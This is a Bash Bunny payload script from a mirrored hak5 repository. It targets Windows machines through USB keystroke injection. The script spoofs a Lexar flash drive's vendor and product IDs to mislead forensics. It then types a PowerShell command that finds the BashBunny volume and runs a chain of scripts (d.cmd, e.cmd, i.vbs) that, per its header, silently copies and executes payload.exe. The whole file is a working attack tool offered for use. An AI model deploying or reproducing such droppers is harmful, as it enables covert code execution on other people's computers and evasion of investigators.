mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
32 lines
977 B
Bash
32 lines
977 B
Bash
#!/bin/bash
|
|
#
|
|
# Title: SmartFileExtract
|
|
# Author: IMcPwn
|
|
# Props: SaintCrossbow
|
|
# Version: 1.0
|
|
# Targets: Windows
|
|
# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
|
|
# which in turn executes e.cmd invisibly using i.vbs
|
|
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
|
|
# using the --startup parameter. Change these settings inside of e.cmd.
|
|
#
|
|
# LEDS:
|
|
# Red: Attacking
|
|
# Green: Finished
|
|
|
|
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
|
|
source bunny_helpers.sh
|
|
|
|
LED R
|
|
# Note: Acting as Lexar Compact Flash Drive to throw off forensics
|
|
ATTACKMODE HID STORAGE VID_0X05DC PID_0X0081
|
|
QUACK DELAY 200
|
|
REM --> Minimize all windows
|
|
QUACK WINDOWS d
|
|
QUACK DELAY 200
|
|
QUACK GUI r
|
|
QUACK DELAY 100
|
|
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch2\d.cmd')"
|
|
QUACK ENTER
|
|
LED G
|